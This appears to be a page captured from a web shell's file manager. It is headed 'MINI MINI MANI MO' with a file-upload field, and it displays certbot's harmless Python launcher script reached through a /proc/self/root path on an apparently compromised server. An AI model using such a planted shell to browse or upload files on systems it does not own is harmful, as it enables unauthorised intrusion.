MINI MINI MANI MO

Path : /proc/self/root/snap/certbot/current/bin/
File Upload :
Current File : //proc/self/root/snap/certbot/current/bin/certbot

#!/usr/bin/env python3
import sys
from certbot.main import main
if __name__ == '__main__':
    sys.argv[0] = sys.argv[0].removesuffix('.exe')
    sys.exit(main())

OHA YOOOO